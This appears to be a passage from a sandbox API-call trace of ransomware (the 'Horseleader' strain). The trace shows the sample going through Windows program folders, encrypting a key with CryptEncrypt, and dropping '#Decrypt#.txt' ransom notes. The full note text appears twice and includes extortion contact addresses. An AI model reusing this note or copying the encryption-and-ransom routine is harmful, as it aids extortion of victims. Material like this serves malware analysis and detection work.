ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f80cbd1, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f832d2f, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xd7, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="oskmenu.xml", cAlternateFileName="")) returned 1 [0233.254] lstrcmpiW (lpString1="oskmenu.xml", lpString2="Windows") returned -1 [0233.254] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml") returned 80 [0233.254] StrStrIW (lpFirst="oskmenu.xml", lpSrch=".horseleader") returned 0x0 [0233.254] lstrcmpW (lpString1="oskmenu.xml", lpString2="#Decrypt#.txt") returned 1 [0233.254] lstrcmpW (lpString1="oskmenu.xml", lpString2="_uninstalling_.png") returned 1 [0233.254] lstrlenW (lpString=".testttjffg") returned 11 [0233.254] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common 
Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml", lpSrch=".testttjffg") returned 0x0 [0233.254] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0233.254] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0233.255] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0233.255] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7c69c0, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7c69c0, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="osknumpad", cAlternateFileName="OSKNUM~1")) returned 1 [0233.255] lstrcmpiW (lpString1="osknumpad", lpString2="Windows") returned -1 [0233.255] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad") returned 78 [0233.255] lstrcmpW (lpString1="osknumpad", lpString2=".") returned 1 [0233.255] lstrcmpW (lpString1="osknumpad", lpString2="..") returned 1 [0233.255] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0233.255] GetProcessHeap () returned 0x780000 [0233.255] 
RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dd078 [0233.255] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\*") returned 80 [0233.255] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\*", lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7c69c0, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7c69c0, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName=".", cAlternateFileName="")) returned 0x7c68a0 [0233.255] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0233.255] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\.") returned 80 [0233.255] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0233.255] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7c69c0, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7c69c0, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName="..", cAlternateFileName="")) returned 1 [0233.255] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0233.256] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\..") returned 81 
[0233.256] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0233.256] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0233.256] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fdda123, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8fdda123, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8fdda123, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x59d, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName="osknumpadbase.xml", cAlternateFileName="")) returned 1 [0233.256] lstrcmpiW (lpString1="osknumpadbase.xml", lpString2="Windows") returned -1 [0233.256] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml") returned 96 [0233.256] StrStrIW (lpFirst="osknumpadbase.xml", lpSrch=".horseleader") returned 0x0 [0233.256] lstrcmpW (lpString1="osknumpadbase.xml", lpString2="#Decrypt#.txt") returned 1 [0233.256] lstrcmpW (lpString1="osknumpadbase.xml", lpString2="_uninstalling_.png") returned 1 [0233.256] lstrlenW (lpString=".testttjffg") returned 11 [0233.256] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml", lpSrch=".testttjffg") returned 0x0 [0233.256] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0233.256] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0233.256] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml" (normalized: "c:\\program files\\common files\\microsoft 
shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0233.256] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fdda123, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8fdda123, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8fdda123, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x59d, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName="osknumpadbase.xml", cAlternateFileName="")) returned 0 [0233.256] FindClose (in: hFindFile=0x7c68a0 | out: hFindFile=0x7c68a0) returned 1 [0233.256] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\#Decrypt#.txt") returned 92 [0233.257] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0233.257] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0233.257] WriteFile (in: hFile=0x1a4, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32ae920*=0x5e4, lpOverlapped=0x0) returned 1 [0233.258] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0233.258] WriteFile (in: hFile=0x1a4, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32ae920*=0x558, lpOverlapped=0x0) returned 1 [0233.258] CloseHandle (hObject=0x1a4) returned 1 [0233.261] 
GetProcessHeap () returned 0x780000 [0233.261] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dd078 | out: hHeap=0x780000) returned 1 [0233.261] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fdb3fc5, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8fdb3fc5, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8fdb3fc5, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xdb, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="osknumpad.xml", cAlternateFileName="")) returned 1 [0233.261] lstrcmpiW (lpString1="osknumpad.xml", lpString2="Windows") returned -1 [0233.261] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml") returned 82 [0233.261] StrStrIW (lpFirst="osknumpad.xml", lpSrch=".horseleader") returned 0x0 [0233.261] lstrcmpW (lpString1="osknumpad.xml", lpString2="#Decrypt#.txt") returned 1 [0233.261] lstrcmpW (lpString1="osknumpad.xml", lpString2="_uninstalling_.png") returned 1 [0233.261] lstrlenW (lpString=".testttjffg") returned 11 [0233.261] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml", lpSrch=".testttjffg") returned 0x0 [0233.261] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0233.261] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0233.262] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml"), 
dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0233.323] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7c69c0, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7c69c0, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7c69c0, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="oskpred", cAlternateFileName="")) returned 1 [0233.323] lstrcmpiW (lpString1="oskpred", lpString2="Windows") returned -1 [0233.323] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred") returned 76 [0233.323] lstrcmpW (lpString1="oskpred", lpString2=".") returned 1 [0233.323] lstrcmpW (lpString1="oskpred", lpString2="..") returned 1 [0233.323] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0233.323] GetProcessHeap () returned 0x780000 [0233.323] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dd078 [0233.323] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\*") returned 78 [0233.323] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\*", lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7c69c0, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7c69c0, ftLastAccessTime.dwHighDateTime=0x1ca0431, 
ftLastWriteTime.dwLowDateTime=0xfd7c69c0, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName=".", cAlternateFileName="")) returned 0x7c68a0 [0233.324] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0233.324] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\.") returned 78 [0233.324] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0233.324] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7c69c0, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7c69c0, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7c69c0, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName="..", cAlternateFileName="")) returned 1 [0233.324] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0233.324] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\..") returned 79 [0233.324] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0233.324] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0233.324] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fe263df, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8fe263df, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8fe263df, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x39c, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName="oskpredbase.xml", cAlternateFileName="")) returned 1 
[0233.324] lstrcmpiW (lpString1="oskpredbase.xml", lpString2="Windows") returned -1 [0233.324] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml") returned 92 [0233.324] StrStrIW (lpFirst="oskpredbase.xml", lpSrch=".horseleader") returned 0x0 [0233.324] lstrcmpW (lpString1="oskpredbase.xml", lpString2="#Decrypt#.txt") returned 1 [0233.324] lstrcmpW (lpString1="oskpredbase.xml", lpString2="_uninstalling_.png") returned 1 [0233.324] lstrlenW (lpString=".testttjffg") returned 11 [0233.324] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml", lpSrch=".testttjffg") returned 0x0 [0233.324] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0233.324] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0233.324] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0233.600] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fe263df, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8fe263df, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8fe263df, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x39c, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, 
cFileName="oskpredbase.xml", cAlternateFileName="")) returned 0 [0233.710] FindClose (in: hFindFile=0x7c68a0 | out: hFindFile=0x7c68a0) returned 1 [0233.711] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\#Decrypt#.txt") returned 90 [0233.711] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0233.713] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0233.713] WriteFile (in: hFile=0x1a4, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32ae920*=0x5e4, lpOverlapped=0x0) returned 1 [0233.714] lstrlenA (lpString="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") returned 1368 [0233.714] WriteFile (in: hFile=0x1a4, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32ae920*=0x558, lpOverlapped=0x0) returned 1 [0233.714] CloseHandle (hObject=0x1a4) returned 1 [0233.715] GetProcessHeap () returned 0x780000 [0233.715] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dd078 | out: hHeap=0x780000) returned 1 [0233.715] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fe00281, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8fe00281, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8fe00281, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xd7, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="oskpred.xml", cAlternateFileName="")) returned 1 [0233.715] lstrcmpiW (lpString1="oskpred.xml", lpString2="Windows") returned -1 [0233.715] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml") returned 80 [0233.715] StrStrIW (lpFirst="oskpred.xml", lpSrch=".horseleader") returned 0x0 [0233.715] lstrcmpW (lpString1="oskpred.xml", lpString2="#Decrypt#.txt") returned 1 [0233.716] lstrcmpW (lpString1="oskpred.xml", lpString2="_uninstalling_.png") returned 1 [0233.716] lstrlenW (lpString=".testttjffg") returned 11 [0233.716] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common 
Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml", lpSrch=".testttjffg") returned 0x0 [0233.716] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0233.716] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0233.716] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0233.717] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7c69c0, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, 